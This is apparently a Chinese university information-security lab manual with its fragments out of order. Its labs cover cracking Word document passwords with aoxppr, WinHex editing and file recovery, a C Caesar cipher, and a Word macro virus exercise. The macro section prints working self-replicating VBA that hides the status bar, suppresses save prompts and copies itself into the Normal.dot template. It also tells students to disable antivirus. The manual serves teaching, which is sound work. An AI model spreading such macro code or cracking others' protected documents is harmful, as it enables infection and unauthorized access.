信息安全与应用 实验指导书
合集下载
相关主题
- 1、下载文档前请自行甄别文档内容的完整性,平台不提供额外的编辑、内容补充、找答案等附加服务。
- 2、"仅部分预览"的文档,不可在线预览部分如存在完整性等问题,可反馈申请退款(可完整预览的文档不适用该条件!)。
- 3、如文档侵犯您的权益,请联系客服反馈,我们会尽快为您处理(人工客服工作时间:9:00-18:30)。
Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If 3) 检查模板是否已经感染病毒,如果没有,则复制宏病毒代码到模板,并且修改函数名。
录
实验一 office 口令破解工具 aoxppr 的使用
实验目的: 了解 word 口令破解的方法, 掌握暴力破解和字典破解的原理, 具体破解某个 word 文档。 实验要求:某个同学设置 word 口令,长度分别为 4,5,6,采用字母数字混合。 实验步骤: 1. 安装 aoxppr,点 setup,一步步安装完成; 2. 运行 Aoxppr,点击“帮助” ,点击“输入注册码” ,打开 key.txt 文件,输入注册码,OK; 3. 破解类型选项,选暴力破解,字母数字混合,密码长度最大选 6; 4. 某人制作一个 word 文档,对其进行加密; 5. 另一人对其进行解密,在 Aoxppr 中输入待解密文件的文件名,点击开始解密。如果该 文档没有密码,软件马上就会报告此文档不用解密,4 位密码很快就可破译,6 位的密 码破解时间要长一点,运行过程中,随时可以终止运行。 6. 系统破解后,会显示出 Office 文档的密码。 7. 破解过程中可以使用掩码,如密码有 8 位,以 x 开始,以 99 结束,可以设置掩码为 "x?????99" 8. 用该密码去解密 OFFICE 文档。
实验二. winhex 编辑软件的使用
1。利用 Winhex 查看磁盘文件的十六进制编码; 2。利用 Winhex 实现文件的简单数学 3.加密变换;利用 Winhex 恢复被误删除的文件。 实验要求: 1 人 1 组,独立完成 实验步骤: 1. 在 D 盘根目录中建立 X-ways 文件夹,再在这个文件夹中建立 case、images、 temp 等 3 个文件夹,分别用于保存案例文件、镜像文件和临时文件。运行 winhex,进入系统。 2. 根据提示,必须选择“Computer forensics interface(计算机取证) ” 。 3. 完成后进入软件操作界面。 4. 在 D 盘的 X-ways 中建立一个文本文件 x-ways.txt,内容为“练习使用 winhex 软件” 。在 winhex 界面中,单击“file”----“open” 。 5. 将第 1,2 两个字节改为“D1 A7” , “练习”变为“学习” 。 6. 保持打开的 x-ways.txt 文件,单击“Edit”----“modify data” ,选择“xor”并输 入 75,即完成了该文件的加密变换。 7. 在 winhex 中关闭 x-ways.txt 文件,进入“资源管理器”将该文件删除并清空回 收站,此时 windows 系统无法恢复该文件。下面利用 winhex 来恢复该文件。 8. 单击“case data”窗口中的“file”----“create new case”建立新的分析案例, 然后单击“file”----“add medium”添加新的存储介质,此处为 D 盘。添加后 进入“ x-ways ”文件夹,可发现被删除的文件已在其中。右击该文件,选择 “Recover/copy” ,指定目录文件夹后即可恢复该文件。 实验目的:
MsgBox "MicroVirus by Content Security Lab" End Sub 代码解释 以上代码的基本执行流程如下: 1) 进行必要的自我保护
Application.DisplayStatusBar = False Options.SaveNormalPrompt = False 高明的病毒编写者其自我保护将做得非常好,可以使 word 的一些工具栏失效,例如将 工具菜单中的宏选项屏蔽,也可以修改注册表达到很好的隐藏效果。 本例中只是屏蔽状态栏,以免显示宏的运行状态,并且修改公用模板时自动保存,不给 用户提示。 2) 得到当前文档的代码对象和公用模板的代码对象
{ str[i]-=key; if(str[i]<97) str[i]+=26; } return CRYPT_OK; } int ToLowerCase(unsigned char* str) { if(str == NULL) return 0; int i = 0; for(i=0;str[i]!='\0';i++) { if(str[i]>64&&str[i]<91) str[i]+=32; else if(str[i]>96&&str[i]<123); else { printf("输入了非英文字符"); return 1; } } return 0; }
信息安全与应用 实验指导书
任课教师:周才学
目
实验 1. office 口令破解工具 aoxppr 的使用 实验 2. Winhex 编辑软件的使用 实验 3. 用 C 语言编程实现凯撒密码 实验 4. 嗅探器 Ethereal 的使用 实验 5. Word 宏病毒实验 实验 6. Web 恶意代码实验 实验 7. 端口扫描 X-scan 的使用 实验 8. 加密软件 pgp 的使用
return CRYPT_ERROR; } int key = code[0]-97; for(i=0;i<str_length;i++) { str[i]+=key; if(str[i]>122) str[i]-=26; } return CRYPT_OK; } int Decrypt(unsigned char* str,unsigned char* code) { if(str==NULL || code==NULL) return DECRYPT_ERROR; int str_length = 0; int i = 0; while(str[i]!='\0') { str_length++; i++; } if(str_length>1024) { printf("明文的长度超过 1024 位"); return CRYPT_ERROR; } else if(code[1] != '\0') { printf("密钥输入字符不是一位"); return CRYPT_ERROR; } if(ToLowerCase(str) != 0) { printf("明文字符串转化小写字符出错"); return CRYPT_ERROR; } if(ToLowerCase(code) != 0) { printf("密钥字符串转化小写字符出错"); return CRYPT_ERROR; } int key = code[0]-97; for(i=0;i<str_length;i++)
实验三. 用 C 语言编程实现凯撒wk.baidu.com码
一、实验目的: 通过编程实现替代密码算法和置换密码算法,加深对古典密码体制的了解,为深入学习
密码学奠定基础。 二、实验内容:
实验参考步骤: 1. 新建工程。工程类型选“win32 console application” ,输入工程名称, 选取工程存储位置, “下一步” , “一个空工程” ,完成。 2. 选取“FileView” ,点“Source Files” ,按鼠标右键,选取“添加文件 到目录” ,输入文件名,点“确定” 。 3. 开始编程。 4. 编译。在“工程“, ”设置” , “链接”里,把 ws2_32.lib 加入。 5. 编译生成可执行文件。 6. 运行进行测试,输入数据串和密钥,加密,然后解密。记录下明文 和密文。
myCrySubstitude.cpp 内容如下: #include "myCrySubstitude.h" int Encrypt(unsigned char* str,unsigned char* code) { if(str==NULL || code==NULL) return CRYPT_ERROR; int str_length = 0; int i = 0; while(str[i]!='\0') { str_length++; i++; } if(str_length>1024) { printf("明文的长度超过 1024 位"); return CRYPT_ERROR; } else if(code[1] != '\0') { printf("密钥输入字符不是一位"); return CRYPT_ERROR; } if(ToLowerCase(str) != 0) { printf("明文字符串转化小写字符出错"); return CRYPT_ERROR; } if(ToLowerCase(code) != 0) { printf("密钥字符串转化小写字符出错");
2.自我复制功能演示。 打开一个 word 文档,然后按 Alt+F11 调用宏编写窗口(工具宏Visual Basic宏编 辑器),在左侧的 project—>Microsoft Word 对象ThisDocument 中输入以上代码(参见源代 码 macro_1.txt) ,保存,此时当前 word 文档就含有宏病毒,只要下次打开这个 word 文档, 就会执行以上代码,并将自身复制到 Normal.dot ( word 文档的公共模板)和当前文档的 ThisDocument 中 , 同 时 改 变 函 数 名 ( 模 板 中 为 Document_Close , 当 前 文 档 为 Document_Open) ,此时所有的 word 文档打开和关闭时,都将运行以上的病毒代码,可以加 入适当的恶意代码,影响 word 的正常使用,本例中只是简单的跳出一个提示框。 代码如下: 'Micro-Virus Sub Document_Open() On Error Resume Next Application.DisplayStatusBar = False Options.SaveNormalPrompt = False Set ourcodemodule = ThisDocument.VBProject.VBComponents(1).CodeModule Set host = NormalTemplate.VBProject.VBComponents(1).CodeModule If ThisDocument = NormalTemplate Then Set host = ActiveDocument.VBProject.VBComponents(1).CodeModule End If With host If .Lines(1, 1) <> "'Micro-Virus" Then .DeleteLines 1, .CountOfLines .InsertLines 1, ourcodemodule.Lines(1, 100) .ReplaceLine 2, "Sub Document_Close()" If ThisDocument = NormalTemplate Then .ReplaceLine 2, "Sub Document_Open()" ActiveDocument.SaveAs ActiveDocument.FullName End If End If End With
实验四. 嗅探器 Ethereal 的使用
参看教材 P300 页。
实验五.Word 宏病毒实验
实验目的: 1. 演示宏的编写;2、说明宏的原理及其安全漏洞和缺陷;3、理解宏病毒的作用机制
实验平台: Windows 系列操作系统,Word 2003 应用程序 实验步骤: 1.软件设置:关闭杀毒软件;打开 Word 2003,在工具宏安全性中,将安全级别设置 为低, 在可靠发行商选项卡中, 选择信任任何所有安装的加载项和模板, 选择信任 visual basic 项目的访问。 注意:为了保证该实验不至于造成较大的破坏性,进行实验感染后,被感染终端不要打开过 多的 word 文档,否则清除比较麻烦(对每个打开过的文档都要清除) 。